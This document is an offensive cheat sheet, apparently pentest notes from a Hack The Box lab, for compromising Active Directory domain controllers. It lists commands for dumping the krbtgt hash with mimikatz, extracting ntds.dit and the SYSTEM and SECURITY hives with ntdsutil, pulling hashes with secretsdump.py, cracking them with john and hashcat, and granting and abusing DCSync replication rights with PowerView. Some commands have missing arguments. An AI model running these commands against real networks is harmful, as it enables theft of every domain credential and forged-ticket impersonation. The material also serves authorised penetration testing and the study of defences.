# Domain Controller specific ## TGT Dump dump the hash used by the domain controller to sign Kerberos tickets. This allows an attacker to create custom tickets and impersonate other users or gain access to different services/hosts ``` lsadump::dcsync /user:krbtgt sekurlsa::krbtgt lsadump::lsa /inject /name:krbtgt ``` ## NTDS Dump NTDS is an encrypted database containing information about the structure and elements of the AD. In order to dump the stored hashes we need to extract the following files. ``` C:\Windows\NTDS\ntds.dit C:\Windows\System32\config\SYSTEM C:\Windows\System32\config\SECURITY ``` To dump the required files use the following command in PowerShell ``` powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full ' q q" ``` Extract the hashes ``` secretsdump.py -security -system -ntds LOCAL ``` Crack the hashes. In order to obtain the passwords we need only the NT part of the hash. given an hash with the following structure `AAAA:BBBB` the actual string to bruteforce is the one to the right of the column ``` john -format=NT -wordlist= hashcat -m 1000 -a 0 --force --show --username #rows follow the format : ``` ## DC Sync To execute this attack we need to operate under a user with the `Replicating Directory Changes All` and `Replicating Directory Changes` privileges. By default Local and Domain Administrators own these privileges. Find users with the required privileges with PowerView ``` Get-ObjectACL -DistinguishedName "dc=,dc=local" -ResolveGUIDs | ? {($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll') } ``` If the current user lacks the required permissions run this command on the DC to add them. ``` Add-ObjectAcl -TargetDistinguishedName "dc=,dc=local" -PrincipalSamAccountName //get user info lsadump::dcsync /domain:htb.local /all /csv //dump all users ``` ### Run remotely ``` secretsdump.py -just-dc /@ //dump NTDS secretsdump.py -just-dc-ntlm /@ //dump TGT ```